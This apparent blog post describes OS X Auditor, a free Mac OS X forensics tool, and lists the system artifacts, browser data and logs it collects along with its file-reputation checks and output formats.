Advertisements

OS X Auditor – Mac Forensics Tool

OS X Auditor is a free Mac OS X computer forensics tool. It parses and hashes the following artifacts on the running system or a copy of a system you want to analyze:

  • the kernel extensions
  • the system agents and daemons
  • the third party’s agents and daemons
  • the old and deprecated system and third party’s startup items
  • the users’ agents
  • the users’ downloaded files
  • the installed applications

It is capable of extracting the following:

  • the users’ quarantined files
  • the users’ Safari history, downloads, topsites, LastSession, HTML5 databases and localstore
  • the users’ Firefox cookies, downloads, form history, permissions, places, and signons
  • the users’ Chrome history and archives history, cookies, login data, top sites, web data, HTML5 databases and local storage
  • the users’ social and email accounts
  • the WiFi access points the audited system has been connected to (and tries to geolocate them)

It also looks for suspicious keywords in the .plist themselves.

 
OS X Auditor can also verify the reputation of each file on:
  • Team Cymru’s MHR
  • VirusTotal
  • your own local database
It can aggregate all logs from the following directories into a zipball:
  • /var/log (-> /private/var/log)
  • /Library/logs
  • the user’s ~/Library/logs
And, the results can be rendered as a simple txt log file, or as an HTML log file, or sent to a Syslog server.

Note: It requires Python 2.7.2 (2.7.9 is OK).

Advertisements

Leave a Reply

Your email address will not be published. Required fields are marked *

Advertisements
Advertisements
%d bloggers like this: